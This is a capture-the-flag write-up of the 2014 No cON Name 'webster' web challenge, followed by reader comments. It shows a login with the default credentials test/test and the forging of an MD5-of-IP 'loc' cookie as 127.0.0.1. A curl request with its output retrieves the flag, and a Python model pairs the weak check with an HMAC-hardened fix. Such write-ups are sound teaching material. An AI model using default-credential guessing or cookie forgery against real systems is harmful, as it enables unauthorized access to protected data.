
WEBster [No cON Name 2014 CTF – QUALS]

This year's «No cON Name Capture The Flag» quals had more than three challenges to compete with for the final, so big thanks to the organizers for extending last year's limit. Right now (09:27 am GMT+2), @DefCon-UA (dcua team) has finished all the challenges, with 12+ hours still left before the competition ends. So it's time to draft some web write-ups.

[Screenshot: all finished]

The first web challenge, «webster» (200 points), shows us a login form. After multiple SQLi, XPath, LDAP... injection attempts with no luck, we tried logging in with common accounts.

Username ‘test’ and password ‘test’ was the lucky pair that gave access to the main private area.

[Screenshot: private_area]


We have id, filename, location and username for 4 files, where Captain Obvious says flag.txt is our target file. But not so fast: something is blocking our attempts to read this file. It says:

"Seems that you are not in the right place for that"

So am I not in the right place? Where could we go to get permissions on that file? Look at the cookies, and pay close attention to the one called ‘loc’:

[Screenshot: the ‘loc’ cookie, 2014-09-14 at 10:41:31]


Oh! It looks like an MD5 hash of something we can't identify on our first try. But wait, maybe location means IP? Let's try with the one that appears in the column:

>>> import hashlib
>>> ip='10.128.29.136'
>>> hashlib.md5(ip).hexdigest()
'c869d000ef5c6fdfa128b058d2865512'

Yes! It's the same IP in hash form, so can you figure out the rest? Let's try replacing this cookie with the 127.0.0.1 location (f528764d624db129b32c21fbca0cb8d6).

$ curl -vvv -k 'https://ctf.noconname.org/webster/content.php?op=4' -H 'Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test;  PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;'
* Adding handle: conn: 0x7fe7cb804000
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0x7fe7cb804000) send_pipe: 1, recv_pipe: 0
* About to connect() to ctf.noconname.org port 443 (#0)
*   Trying 88.87.208.202...
* Connected to ctf.noconname.org (88.87.208.202) port 443 (#0)
* TLS 1.0 connection using TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
* Server certificate: ctf.noconname.org
> GET /webster/content.php?op=4 HTTP/1.1
> User-Agent: curl/7.30.0
> Host: ctf.noconname.org
> Accept: */*
> Cookie: loc=f528764d624db129b32c21fbca0cb8d6; valid_user=test;  PHPSESSID=uo8lqqhf0slqhn6nbclbnosp04;
>
< HTTP/1.1 200 OK
* Server nginx is not blacklisted
< Server: nginx
< Date: Sun, 14 Sep 2014 08:55:48 GMT
< Content-Type: text/html
< Content-Length: 38
< Connection: keep-alive
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Strict-Transport-Security: max-age=15768000

NCN_f528764d624db129b32c21fbca0cb8d6

flag: NCN_f528764d624db129b32c21fbca0cb8d6
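As an added illustration (not code from the challenge or the original write-up), here is a small Python model of why the ‘loc’ cookie was forgeable: it is an unkeyed MD5 of the IP, so anyone can mint it for any address. Beside it is a hardened variant in which the server issues the cookie for the address it actually observed and binds it with an HMAC under a server-side key; the key and flag used here are constructed placeholders.

```python
import hashlib
import hmac

FLAG = "NCN_<placeholder>"          # constructed placeholder, not the real flag
SERVER_KEY = b"constructed-server-key"  # constructed placeholder; keep secret in practice


def loc_cookie(ip: str) -> str:
    """The challenge's scheme as inferred: loc = md5(IP). No secret involved."""
    return hashlib.md5(ip.encode()).hexdigest()


def weak_check(cookies: dict) -> bool:
    """Authorization as the challenge behaved: trust whatever 'loc' the client sends.
    Anyone who can compute md5("127.0.0.1") passes, regardless of their real address."""
    return cookies.get("loc") == loc_cookie("127.0.0.1")


def issue_loc_cookie(remote_addr: str, key: bytes = SERVER_KEY) -> str:
    """Hardened: the server records the address it observed and authenticates it
    with a keyed MAC, so the client cannot substitute another IP."""
    tag = hmac.new(key, remote_addr.encode(), hashlib.sha256).hexdigest()
    return f"{remote_addr}|{tag}"


def verify_loc_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return the IP the server vouched for, or None if the tag is missing or wrong."""
    ip, sep, tag = cookie.rpartition("|")
    if not sep:
        return None
    expected = hmac.new(key, ip.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    return ip


def hardened_check(cookies: dict, key: bytes = SERVER_KEY) -> bool:
    """Only a cookie the server itself issued for 127.0.0.1 unlocks the file."""
    return verify_loc_cookie(cookies.get("loc", ""), key) == "127.0.0.1"


def read_flag(cookies: dict, check=weak_check) -> str:
    """Model of content.php?op=4: hand out the flag only if the location check passes."""
    return FLAG if check(cookies) else "Seems that you are not in the right place for that"
```

With `weak_check`, the forged cookie from the write-up is accepted; with `hardened_check`, a client-computed MD5 (or any cookie carrying a tag it did not get from the server) is rejected.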

PS: Thanks to my dcua team mates.

4 Comments

Longinos Recuero Bustos

September 15, 2014

An excellent explanation. Best impossible!

See you soon!!

tunelko

September 15, 2014

Thanks :)

dook

September 15, 2014

Awesome! Been searching for some writeups from NCN, yours is the best so far. Nice detail, screenshots and explains it well.
Many Thanks

And congrats to your team! :)

tunelko

September 15, 2014

I’m sure more writeups will be published, what team are you?
Thanks for your comments!
